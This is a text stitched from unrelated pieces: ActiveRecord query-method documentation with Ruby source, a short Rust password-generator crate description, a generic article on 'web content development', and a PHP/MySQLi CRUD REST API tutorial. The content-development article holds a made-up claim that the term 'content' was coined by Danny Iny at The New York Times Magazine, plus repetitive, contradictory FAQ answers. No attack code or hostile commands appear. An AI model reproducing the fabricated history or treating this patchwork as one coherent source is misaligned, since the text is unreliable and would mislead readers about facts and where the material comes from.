:nodoc: case locks when String, TrueClass, NilClass self.lock_value = locks || true else self.lock_value = false end self end #noneObject Returns a chainable relation with zero records. The returned relation implements the Null Object pattern. It is an object with defined null behavior and always returns an empty array of records without querying the database. Any subsequent condition chained to the returned relation will continue generating an empty relation and will not fire any query to the database. Used in cases where a method or scope could return zero records but the result needs to be chainable. For example: @posts = current_user.visible_posts.where(name: params[:name]) # the visible_posts method is expected to return a chainable Relation def visible_posts case role when 'Country Manager' Post.where(country: country) when 'Reviewer' Post.published when 'Bad User' Post.none # It can't be chained if [] is returned. end end 803 804 805 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 803 def none spawn.none! end #none!Object :nodoc: 807 808 809 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 807 def none! # :nodoc: where!("1=0").extending!(NullRelation) end #offset(value) ⇒ Object Specifies the number of rows to skip before returning rows. User.offset(10) # generated SQL has "OFFSET 10" Should be used with order. User.offset(10).order("name ASC") 749 750 751 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 749 def offset(value) spawn.offset!(value) end #offset!(value) ⇒ Object :nodoc: 753 754 755 756 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 753 def offset!(value) # :nodoc: self.offset_value = value self end #optimizer_hints(*args) ⇒ Object Specify optimizer hints to be used in the SELECT statement. Example (for MySQL): Topic.optimizer_hints("MAX_EXECUTION_TIME(50000)", "NO_INDEX_MERGE(topics)") # SELECT /*+ MAX_EXECUTION_TIME(50000) NO_INDEX_MERGE(topics) */ `topics`.* FROM `topics` Example (for PostgreSQL with pg_hint_plan): Topic.optimizer_hints("SeqScan(topics)", "Parallel(topics 8)") # SELECT /*+ SeqScan(topics) Parallel(topics 8) */ "topics".* FROM "topics" 961 962 963 964 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 961 def optimizer_hints(*args) check_if_method_has_arguments!(:optimizer_hints, args) spawn.optimizer_hints!(*args) end #optimizer_hints!(*args) ⇒ Object :nodoc: 966 967 968 969 970 971 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 966 def optimizer_hints!(*args) # :nodoc: args.flatten! self.optimizer_hints_values |= args self end #or(other) ⇒ Object Returns a new relation, which is the logical union of this relation and the one passed as an argument. The two relations must be structurally compatible: they must be scoping the same model, and they must differ only by #where (if no #group has been defined) or #having (if a #group is present). Neither relation may have a #limit, #offset, or #distinct set. Post.where("id = 1").or(Post.where("author_id = 3")) # SELECT `posts`.* FROM `posts` WHERE ((id = 1) OR (author_id = 3)) 690 691 692 693 694 695 696 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 690 def or(other) unless other.is_a? Relation raise ArgumentError, "You have passed #{other.class.name} object to #or. Pass an ActiveRecord::Relation object instead." end spawn.or!(other) end #or!(other) ⇒ Object :nodoc: 698 699 700 701 702 703 704 705 706 707 708 709 710 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 698 def or!(other) # :nodoc: incompatible_values = structurally_incompatible_values_for_or(other) unless incompatible_values.empty? raise ArgumentError, "Relation passed to #or must be structurally compatible. Incompatible values: #{incompatible_values}" end self.where_clause = self.where_clause.or(other.where_clause) self.having_clause = having_clause.or(other.having_clause) self.references_values += other.references_values self end #order(*args) ⇒ Object Allows to specify an order attribute: User.order(:name) # SELECT "users".* FROM "users" ORDER BY "users"."name" ASC User.order(email: :desc) # SELECT "users".* FROM "users" ORDER BY "users"."email" DESC User.order(:name, email: :desc) # SELECT "users".* FROM "users" ORDER BY "users"."name" ASC, "users"."email" DESC User.order('name') # SELECT "users".* FROM "users" ORDER BY name User.order('name DESC') # SELECT "users".* FROM "users" ORDER BY name DESC User.order('name DESC, email') # SELECT "users".* FROM "users" ORDER BY name DESC, email 360 361 362 363 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 360 def order(*args) check_if_method_has_arguments!(:order, args) spawn.order!(*args) end #order!(*args) ⇒ Object Same as #order but operates on relation in-place instead of copying. 366 367 368 369 370 371 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 366 def order!(*args) # :nodoc: preprocess_order_args(args) self.order_values += args self end #preload(*args) ⇒ Object Allows preloading of args, in the same way that #includes does: User.preload(:posts) # SELECT "posts".* FROM "posts" WHERE "posts"."user_id" IN (1, 2, 3) 182 183 184 185 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 182 def preload(*args) check_if_method_has_arguments!(:preload, args) spawn.preload!(*args) end #preload!(*args) ⇒ Object :nodoc: 187 188 189 190 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 187 def preload!(*args) # :nodoc: self.preload_values += args self end #readonly(value = true) ⇒ Object Sets readonly attributes for the returned relation. If value is true (default), attempting to update a record will result in an error. users = User.readonly users.first.save => ActiveRecord::ReadOnlyRecord: User is marked as readonly 817 818 819 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 817 def readonly(value = true) spawn.readonly!(value) end #readonly!(value = true) ⇒ Object :nodoc: 821 822 823 824 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 821 def readonly!(value = true) # :nodoc: self.readonly_value = value self end #references(*table_names) ⇒ Object Use to indicate that the given table_names are referenced by an SQL string, and should therefore be JOINed in any query rather than loaded separately. This method only works in conjunction with #includes. See #includes for more details. User.includes(:posts).where("posts.name = 'foo'") # Doesn't JOIN the posts table, resulting in an error. User.includes(:posts).where("posts.name = 'foo'").references(:posts) # Query now knows the string references posts, so adds a JOIN 215 216 217 218 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 215 def references(*table_names) check_if_method_has_arguments!(:references, table_names) spawn.references!(*table_names) end #references!(*table_names) ⇒ Object :nodoc: 220 221 222 223 224 225 226 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 220 def references!(*table_names) # :nodoc: table_names.flatten! table_names.map!(&:to_s) self.references_values |= table_names self end #reorder(*args) ⇒ Object Replaces any existing order defined on the relation with the specified order. User.order('email DESC').reorder('id ASC') # generated SQL has 'ORDER BY id ASC' Subsequent calls to order on the same relation will be appended. For example: User.order('email DESC').reorder('id ASC').order('name ASC') generates a query with ‘ORDER BY id ASC, name ASC’. 382 383 384 385 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 382 def reorder(*args) check_if_method_has_arguments!(:reorder, args) spawn.reorder!(*args) end #reorder!(*args) ⇒ Object Same as #reorder but operates on relation in-place instead of copying. 388 389 390 391 392 393 394 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 388 def reorder!(*args) # :nodoc: preprocess_order_args(args) unless args.all?(&:blank?) self.reordering_value = true self.order_values = args self end #reselect(*args) ⇒ Object Allows you to change a previously set select statement. Post.select(:title, :body) # SELECT `posts`.`title`, `posts`.`body` FROM `posts` Post.select(:title, :body).reselect(:created_at) # SELECT `posts`.`created_at` FROM `posts` This is short-hand for unscope(:select).select(fields). Note that we’re unscoping the entire select statement. 298 299 300 301 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 298 def reselect(*args) check_if_method_has_arguments!(:reselect, args) spawn.reselect!(*args) end #reselect!(*args) ⇒ Object Same as #reselect but operates on relation in-place instead of copying. 304 305 306 307 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 304 def reselect!(*args) # :nodoc: self.select_values = args self end #reverse_orderObject Reverse the existing order clause on the relation. User.order('name ASC').reverse_order # generated SQL has 'ORDER BY name DESC' 976 977 978 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 976 def reverse_order spawn.reverse_order! end #reverse_order!Object :nodoc: 980 981 982 983 984 985 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 980 def reverse_order! # :nodoc: orders = order_values.uniq orders.compact_blank! self.order_values = reverse_sql_order(orders) self end #rewhere(conditions) ⇒ Object Allows you to change a previously set where condition for a given attribute, instead of appending to that condition. Post.where(trashed: true).where(trashed: false) # WHERE `trashed` = 1 AND `trashed` = 0 Post.where(trashed: true).rewhere(trashed: false) # WHERE `trashed` = 0 Post.where(active: true).where(trashed: true).rewhere(trashed: false) # WHERE `active` = 1 AND `trashed` = 0 This is short-hand for unscope(where: conditions.keys).where(conditions). Note that unlike reorder, we’re only unscoping the named conditions – not the entire where statement. 676 677 678 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 676 def rewhere(conditions) unscope(where: conditions.keys).where(conditions) end #select(*fields) ⇒ Object Works in two unique ways. First: takes a block so it can be used just like Array#select. Model.all.select { |m| m.field == value } This will build an array of objects from the database for the scope, converting them into an array and iterating through them using Array#select. Second: Modifies the SELECT statement for the query so that only certain fields are retrieved: Model.select(:field) # => [#<Model id: nil, field: "value">] Although in the above example it looks as though this method returns an array, it actually returns a relation object and can have other query methods appended to it, such as the other methods in ActiveRecord::QueryMethods. The argument to the method can also be an array of fields. Model.select(:field, :other_field, :and_one_more) # => [#<Model id: nil, field: "value", other_field: "value", and_one_more: "value">] You can also use one or more strings, which will be used unchanged as SELECT fields. Model.select('field AS field_one', 'other_field AS field_two') # => [#<Model id: nil, field: "value", other_field: "value">] If an alias was specified, it will be accessible from the resulting objects: Model.select('field AS field_one').first.field_one # => "value" Accessing attributes of an object that do not have fields retrieved by a select except id will throw ActiveModel::MissingAttributeError: Model.select(:field).first.other_field # => ActiveModel::MissingAttributeError: missing attribute: other_field Raises: • (ArgumentError) 268 269 270 271 272 273 274 275 276 277 278 279 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 268 def select(*fields) if block_given? if fields.any? raise ArgumentError, "`select' with block doesn't take arguments." end return super() end raise ArgumentError, "Call `select' with at least one field" if fields.empty? spawn._select!(*fields) end #skip_preloading!Object :nodoc: 992 993 994 995 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 992 def skip_preloading! # :nodoc: self.skip_preloading_value = true self end #skip_query_cache!(value = true) ⇒ Object :nodoc: 987 988 989 990 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 987 def skip_query_cache!(value = true) # :nodoc: self.skip_query_cache_value = value self end #unscope(*args) ⇒ Object Removes an unwanted relation that is already defined on a chain of relations. This is useful when passing around chains of relations and would like to modify the relations without reconstructing the entire chain. User.order('email DESC').unscope(:order) == User.all The method arguments are symbols which correspond to the names of the methods which should be unscoped. The valid arguments are given in VALID_UNSCOPING_VALUES. The method can also be called with multiple arguments. For example: User.order('email DESC').select('id').where(name: "John") .unscope(:order, :select, :where) == User.all One can additionally pass a hash as an argument to unscope specific :where values. This is done by passing a hash with a single key-value pair. The key should be :where and the value should be the where value to unscope. For example: User.where(name: "John", active: true).unscope(where: :name) == User.where(active: true) This method is similar to #except, but unlike #except, it persists across merges: User.order('email').merge(User.except(:order)) == User.order('email') User.order('email').merge(User.unscope(:order)) == User.all This means it can be used in association definitions: has_many :comments, -> { unscope(where: :trashed) } 433 434 435 436 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 433 def unscope(*args) check_if_method_has_arguments!(:unscope, args) spawn.unscope!(*args) end #unscope!(*args) ⇒ Object :nodoc: 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 438 def unscope!(*args) # :nodoc: args.flatten! self.unscope_values += args args.each do |scope| case scope when Symbol scope = :left_outer_joins if scope == :left_joins if !VALID_UNSCOPING_VALUES.include?(scope) raise ArgumentError, "Called unscope() with invalid unscoping argument ':#{scope}'. Valid arguments are :#{VALID_UNSCOPING_VALUES.to_a.join(", :")}." end assert_mutability! @values.delete(scope) when Hash scope.each do |key, target_value| if key != :where raise ArgumentError, "Hash arguments in .unscope(*args) must have :where as the key." end target_values = Array(target_value).map(&:to_s) self.where_clause = where_clause.except(*target_values) end else raise ArgumentError, "Unrecognized scoping: #{args.inspect}. Use .unscope(where: :attribute_name) or .unscope(:order), for example." end end self end #where(opts = :chain, *rest) ⇒ Object Returns a new relation, which is the result of filtering the current relation according to the conditions in the arguments. #where accepts conditions in one of several formats. In the examples below, the resulting SQL is given as an illustration; the actual query generated may be different depending on the database adapter. string A single string, without additional arguments, is passed to the query constructor as an SQL fragment, and used in the where clause of the query. Client.where("orders_count = '2'") # SELECT * from clients where orders_count = '2'; Note that building your own string from user input may expose your application to injection attacks if not done properly. As an alternative, it is recommended to use one of the following methods. array If an array is passed, then the first element of the array is treated as a template, and the remaining elements are inserted into the template to generate the condition. Active Record takes care of building the query to avoid injection attacks, and will convert from the ruby type to the database type where needed. Elements are inserted into the string in the order in which they appear. User.where(["name = ? and email = ?", "Joe", "[email protected]"]) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; Alternatively, you can use named placeholders in the template, and pass a hash as the second element of the array. The names in the template are replaced with the corresponding values from the hash. User.where(["name = :name and email = :email", { name: "Joe", email: "[email protected]" }]) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; This can make for more readable code in complex queries. Lastly, you can use sprintf-style % escapes in the template. This works slightly differently than the previous methods; you are responsible for ensuring that the values in the template are properly quoted. The values are passed to the connector for quoting, but the caller is responsible for ensuring they are enclosed in quotes in the resulting SQL. After quoting, the values are inserted using the same escapes as the Ruby core method Kernel::sprintf. User.where(["name = '%s' and email = '%s'", "Joe", "[email protected]"]) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; If #where is called with multiple arguments, these are treated as if they were passed as the elements of a single array. User.where("name = :name and email = :email", { name: "Joe", email: "[email protected]" }) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]'; When using strings to specify conditions, you can use any operator available from the database. While this provides the most flexibility, you can also unintentionally introduce dependencies on the underlying database. If your code is intended for general consumption, test with multiple database backends. hash #where will also accept a hash condition, in which the keys are fields and the values are values to be searched for. Fields can be symbols or strings. Values can be single values, arrays, or ranges. User.where({ name: "Joe", email: "[email protected]" }) # SELECT * FROM users WHERE name = 'Joe' AND email = '[email protected]' User.where({ name: ["Alice", "Bob"]}) # SELECT * FROM users WHERE name IN ('Alice', 'Bob') User.where({ created_at: (Time.now.midnight - 1.day)..Time.now.midnight }) # SELECT * FROM users WHERE (created_at BETWEEN '2012-06-09 07:00:00.000000' AND '2012-06-10 07:00:00.000000') In the case of a belongs_to relationship, an association key can be used to specify the model if an ActiveRecord object is used as the value. author = Author.find(1) # The following queries will be equivalent: Post.where(author: author) Post.where(author_id: author) This also works with polymorphic belongs_to relationships: treasure = Treasure.create(name: 'gold coins') treasure.price_estimates << PriceEstimate.create(price: 125) # The following queries will be equivalent: PriceEstimate.where(estimate_of: treasure) PriceEstimate.where(estimate_of_type: 'Treasure', estimate_of_id: treasure) Joins If the relation is the result of a join, you may create a condition which uses any of the tables in the join. For string and array conditions, use the table name in the condition. User.joins(:posts).where("posts.created_at < ?", Time.now) For hash conditions, you can either use the table name in the key, or use a sub-hash. User.joins(:posts).where({ "posts.published" => true }) User.joins(:posts).where({ posts: { published: true } }) no argument If no argument is passed, #where returns a new instance of WhereChain, that can be chained with #not to return a new relation that negates the where clause. User.where.not(name: "Jon") # SELECT * FROM users WHERE name != 'Jon' See WhereChain for more details on #not. blank condition If the condition is any blank-ish object, then #where is a no-op and returns the current relation. 646 647 648 649 650 651 652 653 654 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 646 def where(opts = :chain, *rest) if :chain == opts WhereChain.new(spawn) elsif opts.blank? self else spawn.where!(opts, *rest) end end #where!(opts, *rest) ⇒ Object :nodoc: 656 657 658 659 660 661 # File 'activerecord/lib/active_record/relation/query_methods.rb', line 656 def where!(opts, *rest) # :nodoc: opts = sanitize_forbidden_attributes(opts) references!(PredicateBuilder.references(opts)) if Hash === opts self.where_clause += where_clause_factory.build(opts, rest) self end
__label__pos
0.968808
Crate passg_lib[][src] Expand description This library provides a convenient way to generate pseudorandom passwords according to some given constraints. Example use passg::prelude::*; let generator = GeneratorBuilder::default().build(); let password = generator.generate(); Modules This module configures the collating sequences (aka charsets) that are available for generating a pseudo-random password. This module defines the error that might occur while using passg. This module defines the type used to configure and generate passwords A prelude you can use to easily get started
__label__pos
0.929721
Home Web Development Web Content Development – The Complete Guide Web Content Development – The Complete Guide 60 0 Web Content Development is a huge and growing field. More websites are launching every single day, and web content is becoming increasingly more important for search engine optimization (SEO). Most content is written and created in word processing programs. However, video creation tools like Adobe After Effects are also used. Content can be articles, blogs, ebooks, white papers, or other types of materials. The content can be text-based, graphic-based, or a combination of both. The main purpose of creating content is to educate and inform people. This can include topics like health, fitness, beauty, finance, psychology, etc. According to a recent survey by W3Techs, in 2015, there were over 1.8 billion websites, most likely to contain content optimized for search engines. That’s a lot of people looking to access content online. With all of that traffic, web content is the key to success. It’s what will keep users on your site and what will help them become repeat visitors. Content creation is a great way to earn money online. Many people have made a living at it, and many more have found the process satisfying and rewarding. The great thing about content creation is that there are many different ways to get paid. You can write blogs, articles, guides, reviews, and more. And with the right social media connections, you can get clients to pay you directly. There’s a lot of competition for freelance writers, but the demand for content is high, so I recommend you get started today. Web Development What is content marketing? Content development is an important part of your online business. If you aren’t writing content, you’re probably doing something else wrong. That said, it’s not the only part of the puzzle. Content is only valuable if someone wants to read it. But you can’t just write something and expect people to find it. You need to ensure that you’re distributing it in a way that maximizes its value to readers. Content development is one of the most important things you can do to make money online. The most effective web content is not necessarily the content that gets the most views but keeps users engaged and coming back for more. It’s not as easy as it sounds. But with the right tools, you can produce excellent content without having to go to school. There are tons of online courses available. Some of them are good, while others are terrible. You must do your research before you invest your time and money in anything. What is content development? The goal of content development is to provide valuable information to your audience. It is also an excellent way to drive traffic to your site. Whether you are just starting out or already have a successful site, there is always room for improvement. By ensuring your content is high-quality and interesting, you can increase the likelihood that people will stick around. Here are some important things to consider for those new to web content development. The first is finding a niche. It would help if you found something you enjoy. The key to making money online is creating content people want. Your niche should also be profitable. If your place is too competitive, few people will buy your content, and if it’s too easy, you’ll end up with nothing. You should also have a plan. How do you intend to make money? Do you want to make a living? Or make a little extra cash? There are a lot of ways to make money online. Some people start by creating a website and making money by promoting products. Others focus on building a community and creating a mailing list. Another way to make money online is to become an affiliate marketer. You can make a commission on each sale by promoting other people’s products. Web Development How to develop good content The term “content” was coined in the mid-1990s by a writer named Danny Iny at The New York Times Magazine. As a content marketer, you may have noticed that many people seem to be talking about content marketing lately. This is because content marketing is the fastest-growing marketing trend of 2016. If you’re looking for a way to build a profitable business, it’s time to start investing in content. Content marketing is one of the best ways to make money online. That’s why I’ve created a comprehensive guide to content marketing and made it available for free. I hope you’ll use it to launch your content marketing campaigns and make money online. When you’re first starting, you may think it’s going to be a piece of cake to write a blog post, but it takes time and practice to develop the ability to write compelling copy. Writing is a skill that requires patience and lots of practice. But once you master it, you’ll be amazed at the quality and variety of work you can produce. As a writer, you’ll be asked to create everything from short blurbs to articles, ebooks, and guides. Content creation tips Content development is one of the most important skills you can learn to make money online. There are many different ways to create content, but I’d recommend focusing on three main areas: Writing Video Graphics The first thing to realize is that these skills can be used to make money online. Once you master these skills, you can apply them to other areas of your business, and you may even end up making money directly from the projects you create. However, if you start with just one of these areas, you may not be able to make money online until you expand into other areas. For example, you won’t make much money if you only have a website and never write or produce a video. It would help if you also understood that creating content can be time-consuming. That means you should consider what you want to spend your time on. Some people make their living creating content every single day. And others do it part-time, and sometimes that’s all they need to support themselves. Web Development Frequently Asked Questions (FAQs) Q: How do you get into web content development? A: I started in web content when I was 14 and then continued when I got my degree at 18. Now I work as a web content designer at an agency and am freelancing. I am also on the editorial side, creating articles and writing blogs. I enjoy it. Q: What do you like most about web content development? A: Web content is a great medium because it’s always changing. There are many opportunities to get your foot in the door and breakthrough. Q: What is your favorite part of web content development? A: My favorite part is getting to help people and be creative. Q: What is your least favorite part of web content development? A: My Least favorite part is the constant pressure to produce more content and keep producing new material. Q: What’s the biggest misconception about Web Content Development? A: The biggest misconception about Web content development is that it is just writing. The biggest misconception is that it is just content; it is developing websites. It can be anything from HTML, JavaScript, or any other scripting language. It’s really what you make of it. Q: How can someone go about getting into Web Content Development? A: The best way is todo it. The biggest misconception about it is that it’s just writing. It’s very technical. People think it’s easy, but it takes time and dedication. If you’re interested, jump in and start doing it. Q: What’s the best thing about Web Content Development? A: I would say it’s freedom. You are in control of the direction of your site. Myths About Web Development 1. Creating a website takes months to years. 2. A web admin can’t learn web design quickly. 3. You have a degree or certification to create and maintain websites. Conclusion Web content development (WCD) is a term used to describe creating web pages and content. WCD includes everything from designing a page to writing and creating images, videos, social media posts, and more. It’s a growing area of online marketing and will only continue to grow in importance in the years ahead. This is why you need to know how to do it well. If you’re wondering if web content development is the right way to go, I hope this article has convinced you. I’ve given you a step-by-step guide to becoming a successful web developer. But it’s not just that. I’ve also shown you why web content development will be the way for most people shortly. As web content becomes increasingly important to every industry, web developers will be in high demand. And that means the competition will be fierce. To become a successful web developer, you’ll need to learn everything you can now. Otherwise, you won’t stand out when the competition is at its peak.
__label__pos
0.708234
CRUD RESTFul API Development in PHP MySQLi Tutorial Share this Article Reading Time: 12 minutes 2,838 Views Inside this article we will see the concept of CRUD RESTFul API Development in PHP MySQLi. We will use the concept of MySQLi prepare methods to secure user inputs as well. CRUD stands for Create, Read, Update and Delete. REpresentational State Transfer (REST) is an architectural style that defines a set of constraints to be used for creating web services. REST API is a way of accessing web services in a simple and flexible way without having any processing. Here, we will consider an items table and will create these following APIs in PHP & MySQLi – • Create Item API • List Item API • List Item Single Details API • Update Item • Delete Item API Learn More – Let’s get started. Create Database & Table To create a database, either we can create via Manual tool of PhpMyadmin or by means of a mysql command. CREATE DATABASE php_applications; Inside this database, we need to create a table. Next, Table: items CREATE TABLE `items` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(50) NOT NULL, `description` text, `price` int(5) NOT NULL, `category_id` int(5) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; This is items table by help of which we will create CRUD APIs. Application Folder Structure You need to follow a folder structure to develop your CRUD based APIs in PHP and MySQLi. Have a look the files and folders inside this application – Create a folder named as rest-api inside your localhost directory. Inside this application folder create class, config and items folder. • Folder – class: This folder contains the class file for CRUD operation which uses prepare methods. Files – Items.php • Folder – config: This folder contains a file i.e database configuration file which connects you with database and it’s table. Files – Database.php • Folder – items: This is basically your module folder. Here, item is the part of CRUD operation. Files – create.php, delete.php, read.php, update.php • .htaccess file which makes your URLs SEO friendly. It removes .php extension from URL. Database Configuration Open Database.php file from /config folder. Add these lines of code into it. <?php class Database{ private $host = "localhost"; private $user = "admin"; private $password = "Admin@123"; private $database = "php_applications"; public function getConnection(){ $conn = new mysqli($this->host, $this->user, $this->password, $this->database); if($conn->connect_error){ die("Error failed to connect to MySQL: " . $conn->connect_error); } else { return $conn; } } } This is for database connectivity. We will created an instance of this class when it will be used. API Class with CRUD Methods Open Items.php file from /class folder. Add these lines of codes into it. <?php class Items{ private $itemsTable = "items"; public $id; public $name; public $description; public $price; public $category_id; private $conn; public function __construct($db){ $this->conn = $db; } function read(){ if($this->id) { $stmt = $this->conn->prepare("SELECT * FROM ".$this->itemsTable." WHERE id = ?"); $stmt->bind_param("i", $this->id); } else { $stmt = $this->conn->prepare("SELECT * FROM ".$this->itemsTable); } $stmt->execute(); $result = $stmt->get_result(); return $result; } function create(){ $stmt = $this->conn->prepare(" INSERT INTO ".$this->itemsTable."(name, description, price, category_id) VALUES(?,?,?,?)"); $this->name = htmlspecialchars(strip_tags($this->name)); $this->description = htmlspecialchars(strip_tags($this->description)); $this->price = htmlspecialchars(strip_tags($this->price)); $this->category_id = htmlspecialchars(strip_tags($this->category_id)); $stmt->bind_param("ssii", $this->name, $this->description, $this->price, $this->category_id); if($stmt->execute()){ return true; } return false; } function update(){ $stmt = $this->conn->prepare(" UPDATE ".$this->itemsTable." SET name= ?, description = ?, price = ?, category_id = ? WHERE id = ?"); $this->id = htmlspecialchars(strip_tags($this->id)); $this->name = htmlspecialchars(strip_tags($this->name)); $this->description = htmlspecialchars(strip_tags($this->description)); $this->price = htmlspecialchars(strip_tags($this->price)); $this->category_id = htmlspecialchars(strip_tags($this->category_id)); $stmt->bind_param("ssiii", $this->name, $this->description, $this->price, $this->category_id, $this->id); if($stmt->execute()){ return true; } return false; } function delete(){ $stmt = $this->conn->prepare(" DELETE FROM ".$this->itemsTable." WHERE id = ?"); $this->id = htmlspecialchars(strip_tags($this->id)); $stmt->bind_param("i", $this->id); if($stmt->execute()){ return true; } return false; } } Inside this API class, we have all methods of CRUD operation. Setup – Create API Open create.php file from /items folder. Open this file and write this code into it. <?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json; charset=UTF-8"); header("Access-Control-Allow-Methods: POST"); header("Access-Control-Max-Age: 3600"); header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With"); include_once '../config/Database.php'; include_once '../class/Items.php'; $database = new Database(); $db = $database->getConnection(); $items = new Items($db); $data = json_decode(file_get_contents("php://input")); if(!empty($data->name) && !empty($data->description) && !empty($data->price) && !empty($data->category_id)){ $items->name = $data->name; $items->description = $data->description; $items->price = $data->price; $items->category_id = $data->category_id; if($items->create()){ http_response_code(201); echo json_encode(array("message" => "Item was created.")); } else{ http_response_code(503); echo json_encode(array("message" => "Unable to create item.")); } }else{ http_response_code(400); echo json_encode(array("message" => "Unable to create item. Data is incomplete.")); } This API file used to create Items inside database table. Setup – Read API Open read.php file from /items folder. Open this file and write this code into it. <?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json; charset=UTF-8"); include_once '../config/Database.php'; include_once '../class/Items.php'; $database = new Database(); $db = $database->getConnection(); $items = new Items($db); $items->id = (isset($_GET['id']) && $_GET['id']) ? $_GET['id'] : '0'; $result = $items->read(); if($result->num_rows > 0){ $itemRecords=array(); $itemRecords["items"]=array(); while ($item = $result->fetch_assoc()) { extract($item); $itemDetails=array( "id" => $id, "name" => $name, "description" => $description, "price" => $price, "category_id" => $category_id ); array_push($itemRecords["items"], $itemDetails); } http_response_code(200); echo json_encode($itemRecords); }else{ http_response_code(404); echo json_encode( array("message" => "No item found.") ); } This API file used to read all Items as well as a single item detail from database table. Setup – Update API Open update.php file from /items folder. Open this file and write this code into it. <?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json; charset=UTF-8"); header("Access-Control-Allow-Methods: POST"); header("Access-Control-Max-Age: 3600"); header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With"); include_once '../config/Database.php'; include_once '../class/Items.php'; $database = new Database(); $db = $database->getConnection(); $items = new Items($db); $data = json_decode(file_get_contents("php://input")); if(!empty($data->id) && !empty($data->name) && !empty($data->description) && !empty($data->price) && !empty($data->category_id)){ $items->id = $data->id; $items->name = $data->name; $items->description = $data->description; $items->price = $data->price; $items->category_id = $data->category_id; if($items->update()){ http_response_code(200); echo json_encode(array("message" => "Item was updated.")); }else{ http_response_code(503); echo json_encode(array("message" => "Unable to update items.")); } } else { http_response_code(400); echo json_encode(array("message" => "Unable to update items. Data is incomplete.")); } This API file used to update Item details on the basis of item it to database table. Setup – Delete API Open delete.php file from /items folder. Open this file and write this code into it. <?php header("Access-Control-Allow-Origin: *"); header("Content-Type: application/json; charset=UTF-8"); header("Access-Control-Allow-Methods: POST"); header("Access-Control-Max-Age: 3600"); header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With"); include_once '../config/Database.php'; include_once '../class/Items.php'; $database = new Database(); $db = $database->getConnection(); $items = new Items($db); $data = json_decode(file_get_contents("php://input")); if(!empty($data->id)) { $items->id = $data->id; if($items->delete()){ http_response_code(200); echo json_encode(array("message" => "Item was deleted.")); } else { http_response_code(503); echo json_encode(array("message" => "Unable to delete item.")); } } else { http_response_code(400); echo json_encode(array("message" => "Unable to delete items. Data is incomplete.")); } This API file used to delete Item on the basis of item from database table. Setup – .htaccess (SEO Friendly URLs) Open .htaccess file from /items folder. Open this file and write this code into it. RewriteEngine On # Turn on the rewriting engine RewriteRule ^read$ read.php [NC,L] RewriteRule ^read/([0-9_-]*)$ read.php?id=$1 [NC,L] RewriteRule ^create$ create.php [NC,L] RewriteRule ^update$ update.php [NC,L] RewriteRule ^delete$ delete.php [NC,L] By the help of this code we are removing .php extension from file names from URLs. This helps to generate SEO friendly URLs. Application Testing Now, We will test CRUD APIs. For testing we will use POSTMAN tool for it. Create Item API URL – http://localhost/rest-api/items/create Method – POST Header Content-Type:application/json Accept:application/json Body { "name": "Toshiba Sewing Machine", "description": "Its best & affordable machine", "price": 20000, "category_id": 5 } Read All Item API URL – http://localhost/rest-api/items/read Method – GET Read Single Item API URL – http://localhost/rest-api/items/read?id=1 Method – GET Update Item API URL – http://localhost/rest-api/items/update Method – POST Header Content-Type:application/json Accept:application/json Body { "id": 3, "name": "Product 3 - Update", "description": "Sample Product 3 - Update", "price": 5000, "category_id": 3 } Delete Item API URL – http://localhost/rest-api/items/delete Method – POST Header Content-Type:application/json Accept:application/json Body { "id": 3 } We hope this article helped you to learn about CRUD RESTFul API Development in PHP MySQLi Tutorial in a very detailed way. Buy Me a Coffee Online Web Tutor invites you to try Skillshike! Learn CakePHP, Laravel, CodeIgniter, Node Js, MySQL, Authentication, RESTful Web Services, etc into a depth level. Master the Coding Skills to Become an Expert in PHP Web Development. So, Search your favourite course and enroll now. If you liked this article, then please subscribe to our YouTube Channel for PHP & it’s framework, WordPress, Node Js video tutorials. You can also find us on Twitter and Facebook. Was this post helpful? Get PHP Web Development Courses on Offer in just ₹299 Get PHP Web Development Courses on Offer in just ₹299
__label__pos
0.912916
